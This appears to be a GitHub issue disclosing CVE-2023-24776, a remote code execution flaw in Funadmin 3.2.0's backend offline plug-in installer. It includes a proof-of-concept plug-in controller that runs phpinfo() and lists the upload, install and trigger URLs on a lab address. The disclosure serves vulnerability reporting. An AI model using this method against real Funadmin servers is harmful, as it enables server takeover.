Headline
CVE-2023-24776: Background offline installation plug-in rce · Issue #7 · funadmin/funadmin
Funadmin v3.2.0 was discovered to contain a remote code execution (RCE) vulnerability via the component \controller\Addon.php.
Vulnerability Product:funadmin
Vulnerability version:.3.2.0
Vulnerability type:romote code exec
Vulnerability Details:
Background offline installation plug-in rce
Vulnerability location occurs in app\backend\controller\Addon.php#installation plug-in does not filter malicious code
Therefore, we can construct a malicious plug-in controller to cause remote code execution
Construct the tarball
snowflake\controller\Index.php executes malicious code here I call phpinfo();
`<?php
namespace addons\snowflake\controller;
use fun\addons\Controller;
use think\App;
class Index extends Controller
{
//首页
public function index()
{
phpinfo();
echo hook_one('snowflake');
}
}`
After the construction of the compressed package is completed, the background plug-in-plugin management-offline installation uploads the malicious compressed package
http://192.168.3.129:8092/backend/ajax/uploads?save=1&path=addon
http://192.168.3.129:8092/backend/addon/localinstall
Visit after successful installation
http://192.168.3.129:8092/addons/snowflake
Successfully trigger our malicious code